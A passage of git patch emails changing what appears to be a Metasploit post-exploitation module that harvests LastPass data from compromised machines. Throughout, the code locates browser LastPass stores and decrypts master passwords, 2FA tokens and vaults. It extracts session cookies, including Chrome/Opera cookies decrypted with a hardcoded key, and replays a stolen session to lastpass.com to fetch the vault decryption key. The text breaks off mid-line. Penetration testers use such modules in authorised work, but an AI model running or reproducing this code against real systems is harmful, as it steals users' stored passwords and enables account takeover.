extract_vault_and_iterations(account_map) print_status "Extracting encryption keys" @@ -94,17 +94,17 @@ class Metasploit3 < Msf::Post browser_path_map = { 'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/databases/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0", 'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox", - 'Opera' => "#{user_profile['LocalAppData']}/.config/Opera/databases/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0" + 'Opera' => "#{user_profile['LocalAppData']}/.config/opera/databases/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0" } localstorage_path_map = { 'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/Local Storage/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage", 'Firefox' => "#{user_profile['LocalAppData']}/.lastpass", - 'Opera' => "#{user_profile['LocalAppData']}/.config/Opera/Local Storage/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage" + 'Opera' => "#{user_profile['LocalAppData']}/.config/opera/Local Storage/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage" } cookies_path_map = { #TODO - 'Chrome' => "", - 'Firefox' => "", - 'Opera' => "" + 'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/Cookies", + 'Firefox' => "", # It's set programmatically + 'Opera' => "#{user_profile['LocalAppData']}/.config/opera/Cookies" } when /osx/ browser_path_map = { @@ -121,9 +121,9 @@ class Metasploit3 < Msf::Post } cookies_path_map = { #TODO 'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/Cookies", - 'Firefox' => "", - 'Opera' => "", - 'Safari' => "" + 'Firefox' => "", # It's set programmatically + 'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/Cookies", + 'Safari' => "#{user_profile['AppData']}/Cookies/Cookies.binarycookies" } else print_error "Platform not recognized: #{platform}" @@ -135,15 +135,9 @@ class Metasploit3 < Msf::Post db_paths = find_db_paths(path, browser, account) if db_paths && db_paths.size > 0 account_map[account][browser]['lp_db_path'] = db_paths - if session.type == "meterpreter" - account_map[account][browser]['localstorage_db'] = localstorage_path_map[browser] if client.fs.file.exists?(localstorage_path_map[browser]) || browser.match(/Firefox|IE/) - account_map[account][browser]['cookies_db'] = cookies_path_map[browser] if client.fs.file.exists?(cookies_path_map[browser]) || browser.match(/Firefox|IE/) - account_map[account][browser]['cookies_db'] = account_map[account][browser]['lp_db_path'].first.gsub("prefs.js", "cookies.sqlite") if (!account_map[account][browser]['lp_db_path'].blank? && browser == 'Firefox') - else # session.type == "shell" - account_map[account][browser]['localstorage_db'] = localstorage_path_map[browser] if session.shell_command("ls \"#{localstorage_path_map[browser]}\"").strip == localstorage_path_map[browser].strip || browser.match(/Firefox|IE/) - account_map[account][browser]['cookies_db'] = cookies_path_map[browser] if session.shell_command("ls \"#{cookies_path_map[browser]}\"").strip == cookies_path_map[browser].strip || browser.match(/Firefox|IE/) - account_map[account][browser]['cookies_db'] = account_map[account][browser]['lp_db_path'].first.gsub("prefs.js", "cookies.sqlite") if (session.shell_command("ls \"#{account_map[account][browser]['lp_db_path']}\"").strip == account_map[account][browser]['lp_db_path'].strip && browser == 'Firefox') - end + account_map[account][browser]['localstorage_db'] = localstorage_path_map[browser] if file_exists?(localstorage_path_map[browser]) || browser.match(/Firefox|IE/) + account_map[account][browser]['cookies_db'] = cookies_path_map[browser] if file_exists?(cookies_path_map[browser]) || browser.match(/Firefox|IE/) + account_map[account][browser]['cookies_db'] = account_map[account][browser]['lp_db_path'].first.gsub("prefs.js", "cookies.sqlite") if (!account_map[account][browser]['lp_db_path'].blank? && browser == 'Firefox') else account_map[account].delete(browser) end @@ -177,11 +171,7 @@ class Metasploit3 < Msf::Post user_profiles = [] case session.platform when /unix|linux/ - if session.type == "meterpreter" - user_names = client.fs.dir.entries("/home") - else - user_names = session.shell_command("ls /home").split - end + user_names = directory_entries("/home") user_names.reject! { |u| %w(. ..).include?(u) } user_names.each do |user_name| user_profiles.push('UserName' => user_name, "LocalAppData" => "/home/#{user_name}") @@ -210,19 +200,11 @@ class Metasploit3 < Msf::Post files = [] if directory?(path) - sep = session.platform =~ /win/ ? '\\' : '/' - if session.type == "meterpreter" - files = client.fs.dir.entries(path) - elsif session.type == "shell" - files = session.shell_command("ls \"#{path}\"").split - else - print_error "Session type not recognized: #{session.type}" - return found_dbs_paths - end + files = directory_entries(path) end files.each do |file_path| unless %w(. .. Shared).include?(file_path) - found_dbs_paths.push([path, file_path].join(sep)) + found_dbs_paths.push([path, file_path].join(system_separator)) end end @@ -234,19 +216,10 @@ class Metasploit3 < Msf::Post found_dbs_paths = [] if directory?(path) - sep = session.platform =~ /win/ ? '\\' : '/' - if session.type == "meterpreter" - files = client.fs.dir.entries(path) - elsif session.type == "shell" - files = session.shell_command("ls \"#{path}\"").split - else - print_error "Session type not recognized: #{session.type}" - return [] - end - + files = directory_entries(path) files.reject! { |file| %w(. ..).include?(file) } files.each do |file_path| - found_dbs_paths.push([path, file_path, 'prefs.js'].join(sep)) if file_path.match(/.*\.default/) + found_dbs_paths.push([path, file_path, 'prefs.js'].join(system_separator)) if file_path.match(/.*\.default/) end end @@ -267,7 +240,7 @@ class Metasploit3 < Msf::Post usernames.each do |username| credentials << [username, nil] end - + # Extract master passwords data = read_registry_key_value('HKEY_CURRENT_USER\Software\AppDataLow\Software\LastPass', "LoginPws") data = Base64.encode64(data) if !data.blank? @@ -285,8 +258,8 @@ class Metasploit3 < Msf::Post end # Extract master passwords - path = localstorage_db_path + client.fs.file.separator + "lp.loginpws" - data = read_remote_file(path) if client.fs.file.exists?(path) # Read file if it exists + path = localstorage_db_path + system_separator + "lp.loginpws" + data = read_remote_file(path) if file_exists?(path) # Read file if it exists end # Get encrypted master passwords @@ -337,7 +310,7 @@ class Metasploit3 < Msf::Post unless ieffcreds.blank? ieffcreds.each do |creds| if creds[1].blank? # No master password found - account_map[account][browser]['lp_creds'][URI.unescape(creds[0])] = {'lp_password' => nil} + account_map[account][browser]['lp_creds'][URI.unescape(creds[0])] = {'lp_password' => nil} else sha256_hex_email = OpenSSL::Digest::SHA256.hexdigest(URI.unescape(creds[0])) sha256_binary_email = [sha256_hex_email].pack "H*" # Do hex2bin @@ -349,7 +322,7 @@ class Metasploit3 < Msf::Post else # Chrome, Safari and Opera loot_path = loot_file(lp_data['lp_db_path'], nil, "#{browser.downcase}.lastpass.database", "application/x-sqlite3", "#{account}'s #{browser} LastPass database #{lp_data['lp_db_path']}") account_map[account][browser]['lp_db_loot'] = loot_path - + next if loot_path.blank? # Parsing/Querying the DB db = SQLite3::Database.new(loot_path) result = db.execute( @@ -375,19 +348,20 @@ class Metasploit3 < Msf::Post account_map.each_pair do |account, browser_map| browser_map.each_pair do |browser, lp_data| if browser.match(/Firefox|IE/) - path = lp_data['localstorage_db'] + client.fs.file.separator + "lp.suid" - data = read_remote_file(path) if client.fs.file.exists?(path) #Read file if it exists + path = lp_data['localstorage_db'] + system_separator + "lp.suid" + data = read_remote_file(path) if file_exists?(path) #Read file if it exists data = windows_unprotect(data) if data != nil && data.size > 32 # Verify Windows protection loot_path = loot_file(nil, data, "#{browser.downcase}.lastpass.localstorage", "application/x-sqlite3", "#{account}'s #{browser} LastPass localstorage #{lp_data['localstorage_db']}") - account_map[account][browser]['lp_2fa'] = data + account_map[account][browser]['lp_2fa'] = data else # Chrome, Safari and Opera - loot_path = loot_file(lp_data['localstorage_db'], nil, "#{browser.downcase}.lastpass.localstorage", "application/x-sqlite3", "#{account}'s #{browser} LastPass localstorage #{lp_data['localstorage_db']}") - db = SQLite3::Database.new(loot_path) - token = db.execute( - "SELECT hex(value) FROM ItemTable " \ - "WHERE key = 'lp.uid';" - ).flatten - + loot_path = loot_file(lp_data['localstorage_db'], nil, "#{browser.downcase}.lastpass.localstorage", "application/x-sqlite3", "#{account}'s #{browser} LastPass localstorage #{lp_data['localstorage_db']}") + if !loot_path.blank? + db = SQLite3::Database.new(loot_path) + token = db.execute( + "SELECT hex(value) FROM ItemTable " \ + "WHERE key = 'lp.uid';" + ).flatten + end token.blank? ? account_map[account][browser]['lp_2fa'] = nil : account_map[account][browser]['lp_2fa'] = token.pack('H*') end end @@ -412,7 +386,7 @@ class Metasploit3 < Msf::Post unless account_map.empty? print_good lastpass_data_table.to_s - loot_file(nil, lastpass_data_table.to_csv, "lastpass.data", "text/csv", "LastPass Data") + loot_file(nil, lastpass_data_table.to_csv, "lastpass.data", "text/csv", "LastPass Data") print_vault_passwords(account_map) end end @@ -423,20 +397,20 @@ class Metasploit3 < Msf::Post lp_data['lp_creds'].each_pair do |username, user_data| if browser.match(/Firefox|IE/) if browser == "Firefox" - iterations_path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_key.itr" - vault_path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.act.sxml" + iterations_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_key.itr" + vault_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.act.sxml" else # IE - iterations_path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_key_ie.itr" - vault_path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.sxml" + iterations_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_key_ie.itr" + vault_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.sxml" end - iterations = read_remote_file(iterations_path) if client.fs.file.exists?(iterations_path) # Read file if it exists + iterations = read_remote_file(iterations_path) if file_exists?(iterations_path) # Read file if it exists iterations = nil if iterations.blank? # Verify content lp_data['lp_creds'][username]['iterations'] = iterations # Find encrypted vault vault = read_remote_file(vault_path) vault = windows_unprotect(vault) if vault != nil && vault.match(/^AQAAA.+/) # Verify Windows protection - vault = vault.sub(/iterations=.*;/, "") if client.fs.file.exists?(vault_path) # Remove iterations info + vault = vault.sub(/iterations=.*;/, "") if file_exists?(vault_path) # Remove iterations info loot_path = loot_file(nil, vault, "#{browser.downcase}.lastpass.vault", "text/plain", "#{account}'s #{browser} LastPass vault") lp_data['lp_creds'][username]['vault_loot'] = loot_path @@ -453,7 +427,7 @@ class Metasploit3 < Msf::Post else lp_data['lp_creds'][username]['iterations'] = 1 end - loot_path = loot_file(nil, vault, "#{browser.downcase}.lastpass.vault", "text/plain", "#{account}'s #{browser} LastPass vault") + loot_path = loot_file(nil, vault, "#{browser.downcase}.lastpass.vault", "text/plain", "#{account}'s #{browser} LastPass vault") lp_data['lp_creds'][username]['vault_loot'] = loot_path else lp_data['lp_creds'][username]['iterations'] = nil @@ -474,7 +448,7 @@ class Metasploit3 < Msf::Post lp_data['lp_creds'][username]['vault_key'] = derive_vault_key_from_creds(username, lp_data['lp_creds'][username]['lp_password'], user_data['iterations']) else # Get vault key decrypting the locally stored one or from the disabled OTP if !browser_checked - decrypt_local_vault_key(account, browser_map) + decrypt_local_vault_key(account, browser_map) browser_checked = true end if lp_data['lp_creds'][username]['vault_key'] == nil # If no vault key was found yet, try with dOTP @@ -495,17 +469,13 @@ class Metasploit3 < Msf::Post browser_map.each_pair do |browser, lp_data| if browser == "IE" - if session.type == "meterpreter" - cookies_files = client.fs.dir.entries(lp_data['cookies_db']) - else - cookies_files = session.shell_command("ls #{lp_data['cookies_db']}").split - end + cookies_files = directory_entries(lp_data['cookies_db']) cookies_files.reject! { |u| %w(. ..).include?(u) } cookies_files.each do |cookie_jar_file| - data = read_remote_file(lp_data['cookies_db'] + client.fs.file.separator + cookie_jar_file) + data = read_remote_file(lp_data['cookies_db'] + system_separator + cookie_jar_file) next if data.blank? if /.*PHPSESSID.(?.*?).lastpass\.com?/m =~ data # Find the session id - loot_path = loot_file(lp_data['cookies_db'] + client.fs.file.separator + cookie_jar_file, nil, "#{browser.downcase}.lastpass.cookies", "text/plain", "#{account}'s #{browser} cookies DB") + loot_path = loot_file(lp_data['cookies_db'] + system_separator + cookie_jar_file, nil, "#{browser.downcase}.lastpass.cookies", "text/plain", "#{account}'s #{browser} cookies DB") session_cookie_value = session_cookie_value_match break end @@ -515,16 +485,13 @@ class Metasploit3 < Msf::Post when /Chrome/ query = "SELECT encrypted_value FROM cookies WHERE host_key = 'lastpass.com' AND name = 'PHPSESSID'" when "Opera" - query = "" + query = "SELECT encrypted_value FROM cookies WHERE host_key = 'lastpass.com' AND name = 'PHPSESSID'" when "Firefox" - query = "SELECT value FROM moz_cookies WHERE baseDomain = 'lastpass.com' AND name = 'PHPSESSID'" - when "Safari" - query = "" + query = "SELECT value FROM moz_cookies WHERE host = 'lastpass.com' AND name = 'PHPSESSID'" else - query = nil - print_error "Browser #{browser} not recognized" + vprint_error "Browser #{browser} not supported for cookies" + next end - # Parsing/Querying the DB loot_path = loot_file(lp_data['cookies_db'], nil, "#{browser.downcase}.lastpass.cookies", "application/x-sqlite3", "#{account}'s #{browser} cookies DB") next if loot_path.blank? @@ -538,9 +505,24 @@ class Metasploit3 < Msf::Post next if result.blank? # No session cookie found for this browser session_cookie_value = result[0][0] end - session_cookie_value = windows_unprotect(Base64.encode64(session_cookie_value)) if (session_cookie_value != nil && Base64.encode64(session_cookie_value).match(/^AQAAA.+/)) return if session_cookie_value.blank? + # Check if cookie value needs to be decrypted + if Base64.encode64(session_cookie_value).match(/^AQAAA.+/) # Windows Data protection API + session_cookie_value = windows_unprotect(Base64.encode64(session_cookie_value)) + elsif session_cookie_value.match(/^v10/) && browser.match(/Chrome|Opera/) # Chrome/Opera encrypted cookie in Linux + decipher = OpenSSL::Cipher.new("AES-256-CBC") + decipher.decrypt + decipher.key = OpenSSL::Digest::SHA256.hexdigest("peanuts") + decipher.iv = " " * 16 + session_cookie_value = session_cookie_value[3..-1] # Discard v10 + begin + session_cookie_value = decipher.update(session_cookie_value) + decipher.final + rescue + print_error "Cookie could not be decrypted" + end + end + # Use the cookie to obtain the encryption key to decrypt the vault key uri = URI('https://lastpass.com/login_check.php') request = Net::HTTP::Post.new(uri) @@ -562,14 +544,14 @@ class Metasploit3 < Msf::Post end # Returns otp, encrypted_key - def extract_otpbin(account, browser, username, lp_data) + def extract_otpbin(account, browser, username, lp_data) if browser.match(/Firefox|IE/) if browser == "Firefox" - path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_ff.sotp" + path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_ff.sotp" else # IE - path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + ".sotp" + path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + ".sotp" end - otpbin = read_remote_file(path) if client.fs.file.exists?(path) #Read file if it exists + otpbin = read_remote_file(path) if file_exists?(path) #Read file if it exists otpbin = windows_unprotect(otpbin) if otpbin != nil && otpbin.match(/^AQAAA.+/) return otpbin else # Chrome, Safari and Opera @@ -578,7 +560,7 @@ class Metasploit3 < Msf::Post "SELECT type, data FROM LastPassData " \ "WHERE username_hash = '"+OpenSSL::Digest::SHA256.hexdigest(username)+"' AND type = 'otp'" ) - [result[0][1]].pack "H*" + return (result.blank? || result[0][1].blank?) ? nil : [result[0][1]].pack("H*") end end @@ -588,7 +570,6 @@ class Metasploit3 < Msf::Post else key = pbkdf2(password, username, key_iteration_count.to_i, 32).first end - key end @@ -620,9 +601,9 @@ class Metasploit3 < Msf::Post # LastPass does some preprocessing (UTF8) when doing a SHA256 on special chars (binary) def lastpass_sha256(input) output = "" - + input = input.gsub("\r\n", "\n") - + input.each_byte do |e| if 128 > e output += e.chr @@ -691,7 +672,7 @@ class Metasploit3 < Msf::Post print_error "Vault from #{username} could not be decrypted" next else - encoded_vault = encoded_vault.sub("LPB64", "") + encoded_vault = encoded_vault.sub("LPB64", "") end end @@ -700,7 +681,7 @@ class Metasploit3 < Msf::Post vault.scan(/ACCT/) do |result| chunk_length = vault[$~.offset(0)[1]..$~.offset(0)[1]+3].unpack("H*").first.to_i(16) # Get the length in base 10 of the ACCT chunk chunk = vault[$~.offset(0)[0]..$~.offset(0)[1]+chunk_length] # Get ACCT chunk - account_data = parse_vault_account(chunk, user_data['vault_key']) + account_data = parse_vault_account(chunk, user_data['vault_key']) lastpass_vault_data_table << account_data if account_data != nil end @@ -710,7 +691,7 @@ class Metasploit3 < Msf::Post end end end - end + end end def parse_vault_account(chunk, vaultKey) @@ -722,7 +703,7 @@ class Metasploit3 < Msf::Post encrypted_data = chunk[pointer+4..pointer+4+length-1] label != "url" ? decrypted_data = decrypt_vault_password(vaultKey, encrypted_data) : decrypted_data = [encrypted_data].pack("H*") decrypted_data = "" if decrypted_data == nil - vault_data << decrypted_data if (label == "url" || label == "username" || label == "password") + vault_data << decrypted_data if (label == "url" || label == "username" || label == "password") pointer = pointer + 4 + length end return vault_data[0] == "http://sn" ? nil : vault_data # TODO: Support secure notes @@ -793,10 +774,9 @@ class Metasploit3 < Msf::Post def extract_local_encrypted_vault_key(browser, username, lp_data) if browser.match(/Firefox|IE/) - encrypted_key_path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lpall.slps" + encrypted_key_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lpall.slps" encrypted_vault_key = read_remote_file(encrypted_key_path) encrypted_vault_key = windows_unprotect(encrypted_vault_key) if encrypted_vault_key != nil && encrypted_vault_key.match(/^AQAAA.+/) # Verify Windows protection - else db = SQLite3::Database.new(lp_data['lp_db_loot']) result = db.execute( @@ -809,4 +789,34 @@ class Metasploit3 < Msf::Post return encrypted_vault_key.blank? ? nil : encrypted_vault_key.split("\n")[0] # Return only the key, not the "lastpass rocks" part end -end \ No newline at end of file + # Returns OS separator in a session type agnostic way + def system_separator + return session.platform =~ /win/ ? '\\' : '/' + end + + # Returns if file exists in a session type agnostic way + def file_exists?(path) + if session.type == "meterpreter" + return client.fs.file.exists?(path) + elsif session.type == "shell" + return session.shell_command("ls \"#{path}\"").strip == path.strip + else + print_error "Session type not recognized: #{session.type}" + return nil + end + end + + # Return directory content in a session type agnostic way + def directory_entries(path) + if directory?(path) + if session.type == "meterpreter" + return client.fs.dir.entries(path) + elsif session.type == "shell" + return session.shell_command("ls \"#{path}\"").split + else + print_error "Session type not recognized: #{session.type}" + return nil + end + end + end +end From 2fc940cc3ea38e759bd4dec8f861be941d871748 Mon Sep 17 00:00:00 2001 From: Martin Vigo Date: Sat, 19 Dec 2015 22:19:20 -0800 Subject: [PATCH 127/686] Decrypt Chrome and Opera cookies and msdftify code --- modules/post/multi/gather/lastpass_creds.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/post/multi/gather/lastpass_creds.rb b/modules/post/multi/gather/lastpass_creds.rb index 14c1d2d591..462c691026 100644 --- a/modules/post/multi/gather/lastpass_creds.rb +++ b/modules/post/multi/gather/lastpass_creds.rb @@ -373,13 +373,13 @@ class Metasploit3 < Msf::Post lastpass_data_table = Rex::Ui::Text::Table.new( 'Header' => "LastPass Accounts", 'Indent' => 1, - 'Columns' => %w(Account Browser LP_Username LP_Password LP_2FA LP_Key) + 'Columns' => %w(Account LP_Username LP_Password LP_2FA LP_Key) ) account_map.each_pair do |account, browser_map| browser_map.each_pair do |browser, lp_data| lp_data['lp_creds'].each_pair do |username, user_data| - lastpass_data_table << [account, browser, username, user_data['lp_password'], lp_data['lp_2fa'], user_data['vault_key']] + lastpass_data_table << [account, username, user_data['lp_password'], lp_data['lp_2fa'], user_data['vault_key']] end end end From 2ddac42be7015145daa8f165ac9c179a35cfbaa4 Mon Sep 17 00:00:00 2001 From: Martin Vigo Date: Sat, 19 Dec 2015 23:33:32 -0800 Subject: [PATCH 128/686] Perform Rubocop cleanup --- modules/post/multi/gather/lastpass_creds.rb | 122 ++++++++++---------- 1 file changed, 60 insertions(+), 62 deletions(-) diff --git a/modules/post/multi/gather/lastpass_creds.rb b/modules/post/multi/gather/lastpass_creds.rb index 462c691026..4849006dfc 100644 --- a/modules/post/multi/gather/lastpass_creds.rb +++ b/modules/post/multi/gather/lastpass_creds.rb @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Post 'Firefox' => "#{user_profile['LocalAppData']}/.lastpass", 'Opera' => "#{user_profile['LocalAppData']}/.config/opera/Local Storage/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage" } - cookies_path_map = { #TODO + cookies_path_map = { # TODO 'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/Cookies", 'Firefox' => "", # It's set programmatically 'Opera' => "#{user_profile['LocalAppData']}/.config/opera/Cookies" @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Post 'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/Local Storage/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage", 'Safari' => "#{user_profile['AppData']}/Safari/LocalStorage/safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0.localstorage" } - cookies_path_map = { #TODO + cookies_path_map = { # TODO 'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/Cookies", 'Firefox' => "", # It's set programmatically 'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/Cookies", @@ -157,9 +157,9 @@ class Metasploit3 < Msf::Post data = read_registry_key_value('HKEY_CURRENT_USER\Software\AppDataLow\Software\LastPass', "LoginUsers") if data.blank? paths |= ['HKEY_CURRENT_USER\Software\AppDataLow\Software\LastPass'] if !data.blank? && path != "Low\\LastPass" # Hacky way to detect if there is access to user's data (attacker has no root access) elsif browser == "Firefox" # Special case for Firefox - paths |= firefox_profile_files(path, browser) + paths |= firefox_profile_files(path) else - paths |= file_paths(path, browser, account) + paths |= file_paths(path) end vprint_good "Found #{paths.size} #{browser} databases for #{account}" @@ -195,13 +195,11 @@ class Metasploit3 < Msf::Post end # Extracts the databases paths from the given folder ignoring . and .. - def file_paths(path, browser, account) + def file_paths(path) found_dbs_paths = [] files = [] - if directory?(path) - files = directory_entries(path) - end + files = directory_entries(path) if directory?(path) files.each do |file_path| unless %w(. .. Shared).include?(file_path) found_dbs_paths.push([path, file_path].join(system_separator)) @@ -212,7 +210,7 @@ class Metasploit3 < Msf::Post end # Returns the profile files for Firefox - def firefox_profile_files(path, browser) + def firefox_profile_files(path) found_dbs_paths = [] if directory?(path) @@ -231,7 +229,7 @@ class Metasploit3 < Msf::Post credentials = [] data = nil - if(prefs_path == nil) # IE + if prefs_path.nil? # IE data = read_registry_key_value('HKEY_CURRENT_USER\Software\AppDataLow\Software\LastPass', "LoginUsers") data = read_registry_key_value('HKEY_CURRENT_USER\Software\LastPass', "LoginUsers") if data.blank? return [] if data.blank? @@ -243,10 +241,10 @@ class Metasploit3 < Msf::Post # Extract master passwords data = read_registry_key_value('HKEY_CURRENT_USER\Software\AppDataLow\Software\LastPass', "LoginPws") - data = Base64.encode64(data) if !data.blank? + data = Base64.encode64(data) unless data.blank? else # Firefox loot_path = loot_file(prefs_path, nil, 'firefox.preferences', "text/javascript", "Firefox preferences file") - return [] if !loot_path + return [] unless loot_path File.readlines(loot_path).each do |line| if /user_pref\("extensions.lastpass.loginusers", "(?.*)"\);/ =~ line usernames = encoded_users.split("|") @@ -269,7 +267,7 @@ class Metasploit3 < Msf::Post creds_per_user.each_with_index do |user_creds, index| parts = user_creds.split('=') for creds in credentials - creds[1] = parts[1] if creds[0] == parts[0] # Add the password to the existing username + creds[1] = parts[1] if creds[0] == parts[0] # Add the password to the existing username end end credentials @@ -281,7 +279,7 @@ class Metasploit3 < Msf::Post if encrypted_data.include?("|") # Use CBC decipher = OpenSSL::Cipher.new("AES-256-CBC") decipher.iv = Base64.decode64(encrypted_data[1, 24]) # Discard ! and | - encrypted_data = encrypted_data[26..-1] #Take only the data part + encrypted_data = encrypted_data[26..-1] # Take only the data part else # Use ECB decipher = OpenSSL::Cipher.new("AES-256-ECB") end @@ -310,12 +308,12 @@ class Metasploit3 < Msf::Post unless ieffcreds.blank? ieffcreds.each do |creds| if creds[1].blank? # No master password found - account_map[account][browser]['lp_creds'][URI.unescape(creds[0])] = {'lp_password' => nil} + account_map[account][browser]['lp_creds'][URI.unescape(creds[0])] = { 'lp_password' => nil } else sha256_hex_email = OpenSSL::Digest::SHA256.hexdigest(URI.unescape(creds[0])) sha256_binary_email = [sha256_hex_email].pack "H*" # Do hex2bin creds[1] = decrypt_data(sha256_binary_email, URI.unescape(creds[1])) - account_map[account][browser]['lp_creds'][URI.unescape(creds[0])] = {'lp_password' => creds[1]} + account_map[account][browser]['lp_creds'][URI.unescape(creds[0])] = { 'lp_password' => creds[1] } end end end @@ -335,7 +333,7 @@ class Metasploit3 < Msf::Post sha256_hex_email = OpenSSL::Digest::SHA256.hexdigest(row[0]) sha256_binary_email = [sha256_hex_email].pack "H*" # Do hex2bin row[1].blank? ? row[1] = nil : row[1] = decrypt_data(sha256_binary_email, row[1]) # Decrypt master password - account_map[account][browser]['lp_creds'][row[0]] = {'lp_password' => row[1]} + account_map[account][browser]['lp_creds'][row[0]] = { 'lp_password' => row[1] } end end end @@ -343,19 +341,19 @@ class Metasploit3 < Msf::Post end end - #Extracts the 2FA token from localStorage + # Extracts the 2FA token from localStorage def extract_2fa_tokens(account_map) account_map.each_pair do |account, browser_map| browser_map.each_pair do |browser, lp_data| if browser.match(/Firefox|IE/) path = lp_data['localstorage_db'] + system_separator + "lp.suid" - data = read_remote_file(path) if file_exists?(path) #Read file if it exists + data = read_remote_file(path) if file_exists?(path) # Read file if it exists data = windows_unprotect(data) if data != nil && data.size > 32 # Verify Windows protection loot_path = loot_file(nil, data, "#{browser.downcase}.lastpass.localstorage", "application/x-sqlite3", "#{account}'s #{browser} LastPass localstorage #{lp_data['localstorage_db']}") account_map[account][browser]['lp_2fa'] = data else # Chrome, Safari and Opera loot_path = loot_file(lp_data['localstorage_db'], nil, "#{browser.downcase}.lastpass.localstorage", "application/x-sqlite3", "#{account}'s #{browser} LastPass localstorage #{lp_data['localstorage_db']}") - if !loot_path.blank? + unless loot_path.blank? db = SQLite3::Database.new(loot_path) token = db.execute( "SELECT hex(value) FROM ItemTable " \ @@ -368,7 +366,7 @@ class Metasploit3 < Msf::Post end end - #Print all extracted LastPass data + # Print all extracted LastPass data def print_lastpass_data(account_map) lastpass_data_table = Rex::Ui::Text::Table.new( 'Header' => "LastPass Accounts", @@ -418,7 +416,7 @@ class Metasploit3 < Msf::Post db = SQLite3::Database.new(lp_data['lp_db_loot']) result = db.execute( "SELECT data FROM LastPassData " \ - "WHERE username_hash = '" + OpenSSL::Digest::SHA256.hexdigest(username)+"' AND type = 'accts'" + "WHERE username_hash = '" + OpenSSL::Digest::SHA256.hexdigest(username) + "' AND type = 'accts'" ) if result.size == 1 && !result[0].blank? @@ -447,12 +445,12 @@ class Metasploit3 < Msf::Post if !user_data['lp_password'].blank? && user_data['iterations'] != nil # Derive vault key from credentials lp_data['lp_creds'][username]['vault_key'] = derive_vault_key_from_creds(username, lp_data['lp_creds'][username]['lp_password'], user_data['iterations']) else # Get vault key decrypting the locally stored one or from the disabled OTP - if !browser_checked + unless browser_checked decrypt_local_vault_key(account, browser_map) browser_checked = true end - if lp_data['lp_creds'][username]['vault_key'] == nil # If no vault key was found yet, try with dOTP - otpbin = extract_otpbin(account, browser, username, lp_data) + if lp_data['lp_creds'][username]['vault_key'].nil? # If no vault key was found yet, try with dOTP + otpbin = extract_otpbin(browser, username, lp_data) otpbin.blank? ? next : otpbin = otpbin[0..31] lp_data['lp_creds'][username]['vault_key'] = decrypt_vault_key_with_otp(username, otpbin) end @@ -475,7 +473,7 @@ class Metasploit3 < Msf::Post data = read_remote_file(lp_data['cookies_db'] + system_separator + cookie_jar_file) next if data.blank? if /.*PHPSESSID.(?.*?).lastpass\.com?/m =~ data # Find the session id - loot_path = loot_file(lp_data['cookies_db'] + system_separator + cookie_jar_file, nil, "#{browser.downcase}.lastpass.cookies", "text/plain", "#{account}'s #{browser} cookies DB") + loot_file(lp_data['cookies_db'] + system_separator + cookie_jar_file, nil, "#{browser.downcase}.lastpass.cookies", "text/plain", "#{account}'s #{browser} cookies DB") session_cookie_value = session_cookie_value_match break end @@ -526,12 +524,12 @@ class Metasploit3 < Msf::Post # Use the cookie to obtain the encryption key to decrypt the vault key uri = URI('https://lastpass.com/login_check.php') request = Net::HTTP::Post.new(uri) - request.set_form_data("wxsessid" => URI.unescape(session_cookie_value),"uuid" => browser_map['lp_2fa']) + request.set_form_data("wxsessid" => URI.unescape(session_cookie_value), "uuid" => browser_map['lp_2fa']) request.content_type = 'application/x-www-form-urlencoded; charset=UTF-8' response = Net::HTTP.start(uri.hostname, uri.port, :use_ssl => true) { |http| http.request(request) } # Parse response - next if !response.body.match(/pwdeckey\="([a-z0-9]+)"/) # Session must have expired + next unless response.body.match(/pwdeckey\="([a-z0-9]+)"/) # Session must have expired decryption_key = OpenSSL::Digest::SHA256.hexdigest(response.body.match(/pwdeckey\="([a-z0-9]+)"/)[1]) username = response.body.match(/lpusername="([A-Za-z0-9._%+-@]+)"/)[1] @@ -544,36 +542,36 @@ class Metasploit3 < Msf::Post end # Returns otp, encrypted_key - def extract_otpbin(account, browser, username, lp_data) + def extract_otpbin(browser, username, lp_data) if browser.match(/Firefox|IE/) if browser == "Firefox" path = 